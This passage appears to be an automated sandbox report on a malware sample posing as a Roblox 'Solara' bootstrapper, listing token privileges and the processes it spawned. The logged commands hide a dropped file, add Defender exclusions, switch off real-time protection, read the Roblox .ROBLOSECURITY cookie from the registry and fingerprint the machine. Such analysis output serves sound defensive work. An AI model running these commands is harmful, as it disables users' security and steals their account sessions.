| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
Processes
C:\Users\Admin\AppData\Local\Temp\862e555bc983728ac0d7e39fed087a79ec18c5db7208c839aba4db3f6bff0f06_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\862e555bc983728ac0d7e39fed087a79ec18c5db7208c839aba4db3f6bff0f06_NeikiAnalytics.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\system32\PING.EXE
ping localhost
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
